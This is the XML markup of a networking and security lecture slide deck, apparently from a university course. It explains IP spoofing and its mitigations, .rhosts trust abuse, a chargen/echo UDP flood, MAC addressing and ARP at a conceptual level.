            <a:ext cx="8558273" cy="44503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2023B6-8936-D4AB-7216-B5ED29F6F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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FE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1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56E25-B3D5-B1B6-7FDB-B234587CC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Problem often with routers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Routers look at destination addresses only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authentication based on destination addresses only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Change of source address is easy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mitigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Monitor packets, look for packets on external interface having both source and destination address within local domain (software e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>netlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Source address validation: filter invalid source addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Implement cryptographic authentication system-wide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Configure network to reject packets from internet that claim to originate from local address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7A152-A1BC-303E-B915-CB304827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is IP spoofing possible and how to mitigate?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DB605-2053-6EBC-DD8F-B470E30AE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5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F07A8-AEEA-2AEA-9B72-8014F226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30175" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Gain access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Let’s assume a UNIX computer ziel.de</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, an admin can enter all trustworthy machines (no auth necessary), e.g. entry friend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> friend.de is trustworthy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Also every user can do this in their .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attacker can substitute own packets with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>friend.de’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130175" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Denial of Service – UDP flood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UDP packet being sent to a host with falsified return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Connects the target’s “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chargen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>” service openly accessible (erroneously configured port) with echo service of the host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> continuous stream of messages brings machines down</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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A72BC-B701-49AB-9BFB-4AD59759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Spoofing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A17F-052B-9489-9C49-DC892D34D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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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Network Vulnerabilities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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t> Layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0" err="1"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-D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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Transport Lay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>er Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-D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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="443489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Network Layer Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="5496284"/>
            <a:ext cx="10925665" cy="7987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Link Layer Attacks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036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>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>MAC addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b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BB3351-6E63-CD4D-9FD2-D6498F65C79A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877956" y="1480930"/>
            <a:ext cx="10903227" cy="198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3200"/>
              <a:t>32-bit IP address: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1"/>
              <a:t>network-layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> address for interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>used for layer 3 (network layer) forwarding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>e.g.: 128.119.40.136</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Gill Sans M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F51F861-D4AD-CD46-A67F-018CCE6A2B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925425" y="3402170"/>
            <a:ext cx="10903227" cy="226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3200"/>
              <a:t>MAC (or LAN or physical or Ethernet) address:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>function:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000A8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>used “locally” to get frame from one interface to another physically-connected interface (same subnet, in IP-addressing sense)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>48-bit MAC address (for most LANs) burned in NIC ROM, also sometimes software settable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Gill Sans MT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3974C1-45B4-5341-A96C-26EFA0BC954B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="912934" y="5533272"/>
            <a:ext cx="10903227" cy="903016"/>
            <a:chOff x="912934" y="5533272"/>
            <a:chExt cx="10903227" cy="903016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4108502E-90D7-684B-A7CF-A0EB238E3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9171" y="5789957"/>
              <a:ext cx="338868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>
                  <a:solidFill>
                    <a:srgbClr val="000099"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>hexadecimal (base 16) notation</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="000099"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>(each </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="000099"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="000099"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>numeral</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="000099"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>” </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="000099"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>represents 4 bits)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F3EB23B5-9722-524B-A947-6BAB90B5B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21744" y="5895906"/>
              <a:ext cx="623681" cy="213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D04D30B9-A03D-3D4E-82B8-D739C54E39F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2934" y="5533272"/>
              <a:ext cx="10903227" cy="5827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en-US" sz="2800"/>
                <a:t>e.g.: 1A-2F-BB-76-09-AD</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Gill Sans M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87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734" y="4271477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225" y="3351624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94" y="5298866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>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>MAC addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b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id="{639A8D23-CDBF-2646-8186-B3743129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16922"/>
            <a:ext cx="833125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0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>each interface on LAN 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800" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>has unique 48-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="0">
                <a:solidFill>
                  <a:srgbClr val="0000A8"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> address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800" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>has a locally unique 32-bit IP address (as we’ve seen)</a:t>
            </a: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425937" y="3593615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6825" y="4320484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id="{0B96A29F-FA92-4046-A8C4-553BE3BB4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648" y="3308137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1A-2F-BB-76-09-AD</a:t>
            </a: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5327" y="443650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197" y="4779066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id="{75320AB1-33FB-E441-96FA-8A3695961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2781" y="5733635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5200AA6C-1F84-3F41-9A67-F6A4557B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122" y="5577774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0C-C4-11-6F-E3-98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5234" y="442705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659" y="4801702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60" name="Text Box 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D80277F-6853-7C4B-8A3B-77BAE9A5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374" y="3992146"/>
            <a:ext cx="217335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i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>LAN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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(wired or wireless)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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>137.196.7/24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i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853" y="335344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030223" y="2820774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7155" y="413978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678" y="560675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31860" y="420170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3922434" y="3893652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7880069" y="4049022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4DD163-DABA-C240-A6C6-E33234DB2F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6719722" y="3486836"/>
            <a:ext cx="2548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5832544" y="5800310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7" name="Text Box 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D60F09C-EEAE-8949-89C9-70CE657C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58" y="309369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>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>137.196.7.78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609" y="497784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89" name="Text Box 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D84C91A-F7A7-644A-9323-5E12ED7E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5795342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>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>137.196.7.88</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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352" y="5017604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>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>137.196.7.23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390383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>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>MAC addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b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B986A0BA-C01E-D148-B175-80505AC80C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010477" y="1441173"/>
            <a:ext cx="10028583" cy="50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sz="3200"/>
              <a:t>MAC address allocation administered by IEEE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="404813" indent="-274638">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>manufacturer buys portion of MAC address space (to assure uniqueness)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="404813" indent="-274638">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>analogy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>MAC address: like Social Security Number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>IP address: like postal address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> MAC flat address: portability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>can move interface from one LAN to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>recall IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> portable: depends on IP subnet to which node is attached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="320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17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>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ARP: address resolution protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b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1271A-DBC6-204B-8B80-84096104E623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6082748" y="2344599"/>
            <a:ext cx="5193195" cy="953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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000A8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP table: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>each IP node (host, router) on LAN has table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8DB7D2E6-BC71-6342-8A7E-D3134900B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92" y="1314450"/>
            <a:ext cx="1103434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>
                <a:solidFill>
                  <a:srgbClr val="0000A8"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Question:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="0">
                <a:solidFill>
                  <a:srgbClr val="0000A8"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>how to determine interface’s MAC address, knowing its IP address?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F90A8E-A97F-4B47-8617-1E0B801A3FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1248045" y="2971464"/>
            <a:ext cx="4847955" cy="3638349"/>
            <a:chOff x="3970059" y="2973174"/>
            <a:chExt cx="6053187" cy="3638349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Line 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFCCF237-D462-A848-A2F9-0B5DDED1E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134" y="4423877"/>
              <a:ext cx="901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2" name="Line 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F73C0C-F34D-EB41-919F-BDF66A1E5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625" y="3504024"/>
              <a:ext cx="0" cy="655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id="{F5CD6898-8663-6D43-BAA6-A8946A48A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94" y="5451266"/>
              <a:ext cx="0" cy="438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BC091F0C-CFB4-544C-B235-9FB23A12B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7" y="3746015"/>
              <a:ext cx="2046288" cy="2049462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5" name="Line 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F2D744C-309E-1748-8CEF-A191DA937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9225" y="4472884"/>
              <a:ext cx="796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6" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBB39874-5BD1-5D4B-8E31-25BEBA292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3047" y="3460537"/>
              <a:ext cx="1998238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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>1A-2F-BB-76-09-AD</a:t>
              </a:r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id="{7C2882E3-6473-EB4E-9538-2CCE1D1E6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7727" y="458890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8" name="Text Box 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C7845EB-10F3-1149-A9A1-1A0A55753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597" y="4931465"/>
              <a:ext cx="196164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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>58-23-D7-FA-20-B0</a:t>
              </a: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id="{8915AAD7-DFE8-3C4C-854D-2C0B5A246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5181" y="5886035"/>
              <a:ext cx="3603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0" name="Text Box 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07636FFE-5FCF-0A44-960C-F51BD2EC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7522" y="5730174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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>0C-C4-11-6F-E3-98</a:t>
              </a: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65842429-83E8-C843-8F18-759730DAB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634" y="457945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2" name="Text Box 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7472F3E3-B59C-CE45-A51F-F369BE06C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059" y="4954102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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>71-65-F7-2B-08-53</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Text Box 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E01186-F965-E044-8ADB-FE380CAF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3947" y="4420079"/>
              <a:ext cx="2173356" cy="47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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>   LAN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54AF773F-51B4-F84F-A15B-941A3EE3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1253" y="350584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85EE06A5-9204-7B4E-B07F-32BA1B5ED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2623" y="2973174"/>
              <a:ext cx="812800" cy="658813"/>
              <a:chOff x="-44" y="1473"/>
              <a:chExt cx="981" cy="1105"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="83" name="Picture 45" descr="desktop_computer_stylized_medium">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C296A6-6B32-A64A-9411-85507BE0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46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42ECB958-418E-FB44-BE70-E256C588C7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BAB24AC1-02B1-BF40-BED4-B66E7B0C5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49555" y="429218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id="{6A5793AF-4220-9B4D-8408-5F7BDDF46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078" y="575915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id="{6D089618-C037-1B4F-A97C-2B85FEF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84260" y="435410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9" name="Group 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EFC04DC-8B24-2C45-BBD0-44DC6D0A3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4834" y="4046052"/>
              <a:ext cx="812800" cy="658813"/>
              <a:chOff x="-44" y="1473"/>
              <a:chExt cx="981" cy="1105"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="81" name="Picture 39" descr="desktop_computer_stylized_medium">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39121052-FCC5-AA42-AFDF-F25E678CE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24F752F7-3499-2C4B-A0BA-F2D78B1142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0" name="Group 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EBEAAB9-CDB4-CE49-8310-6B2AA6304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2469" y="4201422"/>
              <a:ext cx="812800" cy="658812"/>
              <a:chOff x="-26" y="1473"/>
              <a:chExt cx="981" cy="1105"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="79" name="Picture 48" descr="desktop_computer_stylized_medium">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A09AFECC-5A0F-0A4B-892C-44745CBEA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6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Freeform 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{787BFF11-9679-4D43-96E9-7D4B1E9F39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F83B3ED-014E-C54B-8E5B-330331DC8FB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6872122" y="3639236"/>
              <a:ext cx="25483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41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D892522E-B65A-3B4E-B03F-858DF69A7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944" y="5952710"/>
              <a:ext cx="812800" cy="658813"/>
